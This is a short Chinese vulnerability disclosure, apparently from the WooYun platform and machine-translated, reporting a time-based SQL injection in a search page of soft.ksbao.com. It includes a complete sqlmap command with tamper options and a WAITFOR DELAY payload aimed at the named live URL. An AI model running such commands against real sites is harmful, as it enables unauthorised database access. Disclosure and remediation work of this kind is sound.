漏洞标题 考试宝注入SQL 相关制造商 Ksbao.com 漏洞作者 过路人 提交时间 2016-05-05 15: 27 公共时间 2016-06-19 15: 50 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 10 漏洞状态 制造商已确认 标签标签 漏洞详细信息 Python sqlmap.py --random-agent --tamper=space2comment,charencode --url='http://soft.ksbao.com/search.aspx?key=1&showOne=1'-current-user 注入参数:http://soft.ksbao.com/search.aspx?key=1%27;WAITFOR%20DELAY%20%270: 0: 5%27 - & showOne=1 基于时间的注射 漏洞证明:
修理计划: 逃脱单引号 版权声明:请注明出处。居民A @乌云